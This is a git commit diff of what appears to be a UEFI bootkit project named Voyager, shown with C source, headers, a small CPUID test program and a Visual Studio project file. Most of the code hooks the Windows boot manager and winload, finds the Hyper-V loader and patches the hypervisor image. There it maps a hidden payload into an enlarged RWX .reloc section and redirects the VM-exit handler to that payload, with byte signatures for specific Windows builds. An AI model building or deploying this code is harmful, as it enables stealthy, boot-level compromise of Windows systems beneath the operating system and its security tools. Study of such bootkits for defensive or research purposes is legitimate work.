parent
ac1b24e5c4
commit
dc4c5e3ff2
@ -1,8 +0,0 @@
|
||||
#include <iostream>
|
||||
#include "com.h"
|
||||
|
||||
int main()
|
||||
{
|
||||
std::printf("[+] hyper-v (CPUID) result -> 0x%x\n", cpuid_test(VMEXIT_KEY));
|
||||
std::getchar();
|
||||
}
|
@ -1,7 +1,7 @@
|
||||
_text segment
|
||||
cpuid_test proc
|
||||
hyperv proc
|
||||
cpuid
|
||||
ret
|
||||
cpuid_test endp
|
||||
hyperv endp
|
||||
_text ends
|
||||
end
|
@ -1,3 +1,3 @@
|
||||
#pragma once
|
||||
#define VMEXIT_KEY 0xDEADBEEFDEADBEEF
|
||||
extern "C" size_t cpuid_test(size_t key);
|
||||
extern "C" size_t hyperv(size_t key);
|
@ -0,0 +1,8 @@
|
||||
#include <iostream>
|
||||
#include "com.h"
|
||||
|
||||
int main()
|
||||
{
|
||||
std::printf("[+] hyper-v (CPUID) result -> 0x%x\n", hyperv(VMEXIT_KEY));
|
||||
std::getchar();
|
||||
}
|
@ -0,0 +1,95 @@
|
||||
#include "BootMgfw.h"
|
||||
|
||||
SHITHOOK BootMgfwShitHook;
|
||||
EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID)
|
||||
{
|
||||
UINTN HandleCount = NULL;
|
||||
EFI_STATUS Result;
|
||||
EFI_HANDLE* Handles = NULL;
|
||||
EFI_DEVICE_PATH* DevicePath = NULL;
|
||||
EFI_FILE_HANDLE VolumeHandle;
|
||||
EFI_FILE_HANDLE BootMgfwHandle;
|
||||
EFI_FILE_IO_INTERFACE* FileSystem = NULL;
|
||||
|
||||
// get all the handles to file systems...
|
||||
if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles))))
|
||||
{
|
||||
Print(L"error getting file system handles -> 0x%p\n", Result);
|
||||
return DevicePath;
|
||||
}
|
||||
|
||||
// for each handle to the file system, open a protocol with it...
|
||||
for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx)
|
||||
{
|
||||
if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL))))
|
||||
{
|
||||
Print(L"error opening protocol -> 0x%p\n", Result);
|
||||
return DevicePath;
|
||||
}
|
||||
|
||||
if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle))))
|
||||
{
|
||||
Print(L"error opening file system -> 0x%p\n", Result);
|
||||
return DevicePath;
|
||||
}
|
||||
|
||||
// if we found the correct file (\\efi\\microsoft\\boot\\bootmgfw.efi)
|
||||
if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGR_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))
|
||||
DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGR_PATH);
|
||||
|
||||
VolumeHandle->Close(BootMgfwHandle);
|
||||
if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL))))
|
||||
{
|
||||
Print(L"error closing protocol -> 0x%p\n", Result);
|
||||
return DevicePath;
|
||||
}
|
||||
}
|
||||
return DevicePath;
|
||||
}
|
||||
|
||||
EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath)
|
||||
{
|
||||
EFI_STATUS Result = EFI_SUCCESS;
|
||||
EFI_LOADED_IMAGE* BootMgfw = NULL;
|
||||
|
||||
if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw))))
|
||||
return Result;
|
||||
|
||||
Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase);
|
||||
Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize);
|
||||
|
||||
VOID* ArchStartBootApplication =
|
||||
FindPattern(
|
||||
BootMgfw->ImageBase,
|
||||
BootMgfw->ImageSize,
|
||||
START_BOOT_APPLICATION_SIG,
|
||||
START_BOOT_APPLICATION_MASK
|
||||
);
|
||||
|
||||
if (!ArchStartBootApplication)
|
||||
return EFI_ABORTED;
|
||||
|
||||
Print(L"ArchStartBootApplication -> 0x%p\n", RESOLVE_RVA(ArchStartBootApplication, 5, 1));
|
||||
MakeShitHook(&BootMgfwShitHook, RESOLVE_RVA(ArchStartBootApplication, 5, 1), &ArchStartBootApplicationHook, TRUE);
|
||||
return Result;
|
||||
}
|
||||
|
||||
EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs)
|
||||
{
|
||||
DisableShitHook(&BootMgfwShitHook);
|
||||
VOID* ImgLoadPEImageEx =
|
||||
FindPattern(
|
||||
ImageBase,
|
||||
ImageSize,
|
||||
LOAD_PE_IMG_SIG,
|
||||
LOAD_PE_IMG_MASK
|
||||
);
|
||||
|
||||
Print(L"PE PayLoad Size -> 0x%x\n", PayLoadSize());
|
||||
Print(L"winload base -> 0x%p\n", ImageBase);
|
||||
Print(L"winload size -> 0x%x\n", ImageSize);
|
||||
Print(L"winload.BlImgLoadPEImageEx -> 0x%p\n", RESOLVE_RVA(ImgLoadPEImageEx, 5, 1));
|
||||
|
||||
MakeShitHook(&WinLoadImageShitHook, RESOLVE_RVA(ImgLoadPEImageEx, 5, 1), &BlImgLoadPEImageEx, TRUE);
|
||||
return ((IMG_ARCH_START_BOOT_APPLICATION)BootMgfwShitHook.Address)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArgs);
|
||||
}
|
@ -0,0 +1,27 @@
|
||||
#pragma once
|
||||
#include <Uefi.h>
|
||||
#include <Library/UefiLib.h>
|
||||
#include <Library/DebugLib.h>
|
||||
#include <Library/MemoryAllocationLib.h>
|
||||
#include <Library/UefiBootServicesTableLib.h>
|
||||
#include <Library/UefiRuntimeServicesTableLib.h>
|
||||
#include <Library/DevicePathLib.h>
|
||||
#include <Library/PrintLib.h>
|
||||
#include <Protocol/SimpleFileSystem.h>
|
||||
#include <Protocol/LoadedImage.h>
|
||||
#include <IndustryStandard/PeImage.h>
|
||||
#include <Guid/GlobalVariable.h>
|
||||
#include "WinLoad.h"
|
||||
|
||||
#if WINVER >= 1607
|
||||
#define START_BOOT_APPLICATION_SIG "\xE8\x00\x00\x00\x00\x48\x8B\xCE\x8B\xD8\xE8\x00\x00\x00\x00\x41\x8B\xCF"
|
||||
#define START_BOOT_APPLICATION_MASK "x????xxxxxx????xxx"
|
||||
#endif
|
||||
|
||||
static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATION_MASK), "signature and mask size's dont match...");
|
||||
#define WINDOWS_BOOTMGR_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi"
|
||||
extern SHITHOOK BootMgfwShitHook;
|
||||
typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*);
|
||||
EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID);
|
||||
EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath);
|
||||
EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs);
|
@ -0,0 +1,87 @@
|
||||
#include "HvLoader.h"
|
||||
|
||||
SHITHOOK HvLoadImageHook;
|
||||
SHITHOOK HvLoadAllocImageHook;
|
||||
BOOLEAN ExtendedAllocation = FALSE;
|
||||
BOOLEAN HookedHyperV = FALSE;
|
||||
|
||||
EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
|
||||
UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15)
|
||||
{
|
||||
DisableShitHook(&HvLoadImageHook);
|
||||
EFI_STATUS Result = ((HV_LDR_LOAD_IMAGE)HvLoadImageHook.Address)(a1, a2, a3, a4, ImageBase, ImageSize, a7, a8,
|
||||
a9, a10, a11, a12, a13, a14, a15);
|
||||
EnableShitHook(&HvLoadImageHook);
|
||||
|
||||
if (ExtendedAllocation && !HookedHyperV)
|
||||
{
|
||||
HookedHyperV = TRUE;
|
||||
EFI_IMAGE_DOS_HEADER* HypervDosHeader = *ImageBase;
|
||||
if (HypervDosHeader->e_magic != EFI_IMAGE_DOS_SIGNATURE)
|
||||
return NULL;
|
||||
|
||||
EFI_IMAGE_NT_HEADERS64* HypervNtHeader = (UINT64)HypervDosHeader + HypervDosHeader->e_lfanew;
|
||||
if (HypervNtHeader->Signature != EFI_IMAGE_NT_SIGNATURE)
|
||||
return NULL;
|
||||
|
||||
EFI_IMAGE_SECTION_HEADER* pSection = ((UINT64)&HypervNtHeader->OptionalHeader) +
|
||||
HypervNtHeader->FileHeader.SizeOfOptionalHeader;
|
||||
|
||||
for (UINT16 i = 0; i < HypervNtHeader->FileHeader.NumberOfSections; i += 1, pSection += 1)
|
||||
{
|
||||
if (!AsciiStrCmp(&pSection->Name, ".reloc"))
|
||||
{
|
||||
VOYAGER_DATA_T VoyagerData;
|
||||
MakeVoyagerData
|
||||
(
|
||||
&VoyagerData,
|
||||
*ImageBase,
|
||||
*ImageSize,
|
||||
*ImageBase + pSection->VirtualAddress + pSection->Misc.VirtualSize,
|
||||
PayLoadSize()
|
||||
);
|
||||
|
||||
DBG_PRINT(".reloc section base address -> 0x%p\n", *ImageBase + pSection->VirtualAddress);
|
||||
DBG_PRINT(".reloc section end (aka golden record base address) -> 0x%p\n", *ImageBase + pSection->VirtualAddress + pSection->Misc.VirtualSize);
|
||||
|
||||
VOID* VmExitHook = MapModule(&VoyagerData, PayLoad);
|
||||
VOID* VmExitFunction = HookVmExit
|
||||
(
|
||||
VoyagerData.HypervModuleBase,
|
||||
VoyagerData.HypervModuleSize,
|
||||
VmExitHook
|
||||
);
|
||||
|
||||
pSection->Characteristics = SECTION_RWX;
|
||||
pSection->Misc.VirtualSize += PayLoadSize();
|
||||
DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook);
|
||||
}
|
||||
}
|
||||
|
||||
HypervNtHeader->OptionalHeader.SizeOfImage += PayLoadSize();
|
||||
*ImageSize += PayLoadSize();
|
||||
}
|
||||
|
||||
DBG_PRINT("[HvLoader (Load Image)] ImageBase -> 0x%p, ImageSize -> 0x%p\n", *ImageBase, *ImageSize);
|
||||
return Result;
|
||||
}
|
||||
|
||||
UINT64 EFIAPI HvLoaderBlImgAllocateImageBuffer(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags)
|
||||
{
|
||||
if (imageSize == HV_ALLOC_SIZE && !ExtendedAllocation)
|
||||
{
|
||||
ExtendedAllocation = TRUE;
|
||||
imageSize += PayLoadSize();
|
||||
|
||||
// allocate the entire hyper-v module as rwx...
|
||||
memoryType = BL_MEMORY_ATTRIBUTE_RWX;
|
||||
}
|
||||
|
||||
DisableShitHook(&HvLoadAllocImageHook);
|
||||
UINT64 Result = ((ALLOCATE_IMAGE_BUFFER)HvLoadAllocImageHook.Address)(imageBuffer, imageSize, memoryType, attributes, unused, flags);
|
||||
if(!ExtendedAllocation)
|
||||
EnableShitHook(&HvLoadAllocImageHook);
|
||||
|
||||
DBG_PRINT("[HvLoader (Alloc Image Memory)] Allocated memory -> 0x%p, size -> 0x%x\n", *imageBuffer, imageSize);
|
||||
return Result;
|
||||
}
|
@ -0,0 +1,30 @@
|
||||
#pragma once
|
||||
#include "Utils.h"
|
||||
#include "PayLoad.h"
|
||||
#include "Hvix64.h"
|
||||
|
||||
#if WINVER >= 1607
|
||||
#define ALLOCATE_IMAGE_BUFFER_SIG "\xE8\x00\x00\x00\x00\x4C\x8B\x65\x60"
|
||||
#define ALLOCATE_IMAGE_BUFFER_MASK "x????xxxx"
|
||||
#endif
|
||||
|
||||
#if WINVER == 1703
|
||||
#define HV_LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x44\x8B\xAD"
|
||||
#define HV_LOAD_PE_IMG_MASK "x????xxx"
|
||||
#elif WINVER == 1607
|
||||
#define HV_LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x48\x8B\x4D\x80\x41\x8B\xD4"
|
||||
#define HV_LOAD_PE_IMG_MASK "x????xxxxxxx"
|
||||
#endif
|
||||
|
||||
static_assert(sizeof(HV_LOAD_PE_IMG_SIG) == sizeof(HV_LOAD_PE_IMG_MASK), "signature and mask do not match size...");
|
||||
static_assert(sizeof(ALLOCATE_IMAGE_BUFFER_SIG) == sizeof(ALLOCATE_IMAGE_BUFFER_MASK), "signature and mask do not match size!");
|
||||
typedef EFI_STATUS(EFIAPI* ALLOCATE_IMAGE_BUFFER)(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags);
|
||||
typedef EFI_STATUS(EFIAPI* HV_LDR_LOAD_IMAGE)(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
|
||||
UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15);
|
||||
|
||||
UINT64 EFIAPI HvLoaderBlImgAllocateImageBuffer(VOID** imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID* unused, UINT32 flags);
|
||||
EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a3, VOID* a4, UINT64* ImageBase,
|
||||
UINT32* ImageSize, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14, VOID* a15);
|
||||
|
||||
extern SHITHOOK HvLoadImageHook;
|
||||
extern SHITHOOK HvLoadAllocImageHook;
|
@ -0,0 +1,40 @@
|
||||
#pragma once
|
||||
#include "PayLoad.h"
|
||||
|
||||
#define HV_ALLOC_SIZE 0x1400000
|
||||
#if WINVER == 1703
|
||||
#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x74\xCC\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
|
||||
#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
|
||||
#elif WINVER == 1607
|
||||
#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\xB4\x9F\x49\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
|
||||
#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
|
||||
#endif
|
||||
|
||||
static_assert(sizeof(VMEXIT_HANDLER_SIG) == sizeof(VMEXIT_HANDLER_MASK), "signature does not match mask size!");
|
||||
static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!");
|
||||
|
||||
//
|
||||
// AllocBase is the base address of the extra memory allocated below where hyper-v is
|
||||
// AllocSize is the size of the extra allocated memory... This size == module size...
|
||||
//
|
||||
VOID* MapModule(PVOYAGER_DATA_T VoyagerData, UINT8* ImageBase);
|
||||
|
||||
//
|
||||
// sig scan hv.exe for vmexit call and replace the relative call (RVA) with
|
||||
// an RVA to the vmexit handler hook (which is the golden records entry point)...
|
||||
//
|
||||
// returns a pointer to the original vmexit function address...
|
||||
//
|
||||
VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook);
|
||||
|
||||
//
|
||||
// creates a structure with all the data needed to be passed to the golden record...
|
||||
//
|
||||
VOID MakeVoyagerData
|
||||
(
|
||||
PVOYAGER_DATA_T VoyagerData,
|
||||
VOID* HypervAlloc,
|
||||
UINT64 HypervAllocSize,
|
||||
VOID* PayLoadBase,
|
||||
UINT64 PayLoadSize
|
||||
);
|
@ -0,0 +1,17 @@
|
||||
#pragma once
|
||||
#include "Utils.h"
|
||||
extern unsigned char PayLoad[3072];
|
||||
|
||||
#pragma pack(push, 1)
|
||||
typedef struct _VOYAGER_DATA_T
|
||||
{
|
||||
UINT64 VmExitHandlerRva;
|
||||
UINT64 HypervModuleBase;
|
||||
UINT64 HypervModuleSize;
|
||||
UINT64 ModuleBase;
|
||||
UINT64 ModuleSize;
|
||||
} VOYAGER_DATA_T, * PVOYAGER_DATA_T;
|
||||
#pragma pack(pop)
|
||||
|
||||
UINT32 PayLoadSize(VOID);
|
||||
VOID* PayLoadEntry(VOID* ModuleBase);
|
@ -0,0 +1,35 @@
|
||||
#pragma once
|
||||
#include "ShitHook.h"
|
||||
#define WINVER 1703
|
||||
#define PORT_NUM 0x2F8
|
||||
#define BL_MEMORY_ATTRIBUTE_RWX 0x424000
|
||||
#define SECTION_RWX (EFI_IMAGE_SCN_MEM_READ | EFI_IMAGE_SCN_MEM_WRITE | EFI_IMAGE_SCN_MEM_EXECUTE)
|
||||
|
||||
VOID __outbytestring(UINT16 Port, UINT8* Buffer, UINT32 Count);
|
||||
void __outbyte(unsigned short Port, unsigned char Data);
|
||||
#pragma intrinsic(__outbytestring)
|
||||
#pragma intrinsic(__outbyte)
|
||||
|
||||
static CHAR8 dbg_buffer[0x100];
|
||||
#define DBG_PRINT(...) \
|
||||
AsciiSPrint(dbg_buffer, sizeof dbg_buffer, __VA_ARGS__); \
|
||||
__outbytestring(PORT_NUM, dbg_buffer, AsciiStrLen(dbg_buffer))
|
||||
|
||||
#define RESOLVE_RVA(SIG_RESULT, RIP_OFFSET, RVA_OFFSET) \
|
||||
(*(INT32*)(((UINT64)SIG_RESULT) + RVA_OFFSET)) + ((UINT64)SIG_RESULT) + RIP_OFFSET
|
||||
|
||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
||||
{
|
||||
LIST_ENTRY InLoadOrderLinks; // 16
|
||||
LIST_ENTRY InMemoryOrderLinks; // 32
|
||||
LIST_ENTRY InInitializationOrderLinks; // 48
|
||||
UINT64 ModuleBase; // 56
|
||||
UINT64 EntryPoint; // 64
|
||||
UINTN SizeOfImage; // 72
|
||||
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY, **PPLDR_DATA_TABLE_ENTRY;
|
||||
|
||||
// taken from umap (btbd)
|
||||
BOOLEAN CheckMask(CHAR8* base, CHAR8* pattern, CHAR8* mask);
|
||||
VOID* FindPattern(CHAR8* base, UINTN size, CHAR8* pattern, CHAR8* mask);
|
||||
VOID* GetExport(UINT8* base, CHAR8* export);
|
||||
VOID MemCopy(VOID* dest, VOID* src, UINTN size);
|
@ -0,0 +1,198 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{C4B6B437-62DF-4166-9023-44CFC8A52258}</ProjectGuid>
|
||||
<RootNamespace>HyperMe</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>Voyager (1703-1511)</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PreferredToolArchitecture>x86</PreferredToolArchitecture>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<PreferredToolArchitecture>x86</PreferredToolArchitecture>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<IncludePath>$(ProjectDir)edk2\CryptoPkg\Include;$(ProjectDir)edk2\ShellPkg\Include;$(ProjectDir)edk2\MdePkg\Include\X64;$(ProjectDir)edk2\MdePkg\Include</IncludePath>
|
||||
<LibraryPath>$(ProjectDir)edk2</LibraryPath>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
<TargetExt>.efi</TargetExt>
|
||||
<SourcePath>$(ProjectDir)</SourcePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<IncludePath>$(ProjectDir)edk2\CryptoPkg\Include;$(ProjectDir)edk2\ShellPkg\Include;$(ProjectDir)edk2\MdePkg\Include\X64;$(ProjectDir)edk2\MdePkg\Include;$(ProjectDir)edk2\StdLib\Include;$(ProjectDir)</IncludePath>
|
||||
<LibraryPath>$(ProjectDir)edk2</LibraryPath>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
<TargetExt>.efi</TargetExt>
|
||||
<SourcePath>$(ProjectDir)</SourcePath>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<StringPooling>true</StringPooling>
|
||||
<ExceptionHandling>SyncCThrow</ExceptionHandling>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||
<AdditionalDependencies>UefiHiiLib.lib;UefiHiiServicesLib.lib;UefiSortLib.lib;UefiShellLib.lib;GlueLib.lib;BaseLib.lib;BaseDebugPrintErrorLevelLib.lib;BasePrintLib.lib;UefiLib.lib;UefiBootServicesTableLib.lib;UefiRuntimeServicesTableLib.lib;UefiDevicePathLibDevicePathProtocol.lib;UefiDebugLibConOut.lib;UefiMemoryLib.lib;UefiMemoryAllocationLib.lib;BaseSynchronizationLib.lib;UefiFileHandleLib.lib;UefiApplicationEntryPoint.lib</AdditionalDependencies>
|
||||
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
|
||||
<EntryPointSymbol>EfiMain</EntryPointSymbol>
|
||||
</Link>
|
||||
<ProjectReference>
|
||||
<UseLibraryDependencyInputs>true</UseLibraryDependencyInputs>
|
||||
</ProjectReference>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<StringPooling>true</StringPooling>
|
||||
<ExceptionHandling>SyncCThrow</ExceptionHandling>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||
